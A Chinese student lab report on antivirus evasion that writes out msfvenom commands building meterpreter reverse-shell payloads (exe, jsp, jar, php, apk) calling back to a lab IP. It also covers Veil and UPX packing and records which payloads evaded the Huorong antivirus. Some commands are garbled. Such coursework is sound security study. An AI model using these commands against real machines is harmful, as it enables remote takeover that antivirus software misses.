2019-2020-2 20175301李锦然《网络对抗技术》Exp3 免杀原理与实践#
目录
1.实践目标
(1l)任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
(2)任务二:通过组合应用各种技术实现恶意代码免杀
(3)任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
2.基础知识
2.1免杀原理
免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。
如果要做好免杀,就要清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。
3.实验步骤
3.11.正确使用msf编码器
首先看看上次实验生成的文件只编译了一次的结果
查杀结果来自VirusTotal网站
输入代码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.198.128 LPORT=5301 -f exe > encoded10.exe
生成编译10次的后面程序
证明了多编译几次不会有多的不同,照样会被杀软查杀,尤其是我的火绒查杀了好几次。
3.2.msfvenom生成jsp文件
使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 x> 20175301jsp.jsp生成jsp文件
火绒并没有检测出来
3.3msfvenom生成jar文件
使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 x> 20175301jar.jar生成jar文件
火绒也没有检测出来
3.4msfvenom生成php文件
使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 x> 20175301php.php生成php文件
火绒还是没有反应
3.5msfvenom生成apk(安卓)文件
使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 x> 20175301apk.apk生成apk文件
看起来火绒确实没什么用
3.6使用veil-evasion生成后门程序
下载veil的过程实在曲折,我参阅了许多不同的博客发现最后是缺少win文件
而且不能使用sudo apt-get install win来安装
最后采用了https://www.cnblogs.com/20175317zrw/p/12504140.html中的方法
事实上在打这段字的时候他还在安装,安装速度很慢很慢
最后实践证明veil的隐藏效果比没用好不了多少
3.7 使用加壳工具UPX
看到火绒查杀他我就没啥信心了
3.8通过组合应用各种技术实现恶意代码免杀
有一个已知方法就是使用veil中的其他载荷,在VirusTotal中可以达成0查询率
方法来自博客https://www.cnblogs.com/20175317zrw/p/12504140.html
3.9用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
刚才加壳的就可以
4.实验中问题
是严重的主要问题是在安装veil上,我做得比较后面而且喜欢参考别人的博客,实验中基本的问题都是这么解决的。我相信前人踏出的路能为后面的人创新搭一条便捷的路。
5.问题回答
1) 杀软是如何检测出恶意代码的?
按照特征码,搜索病毒库,一对一vip检测(观察行为特征)
2)免杀是做什么
anti-杀软
3)免杀的基本方法有哪些?
改特征码,不要参照别人的病毒(别在病毒库里),改变行为特征
4)开启杀软能绝对防止电脑中恶意代码吗?
不能,刚才我就做到了。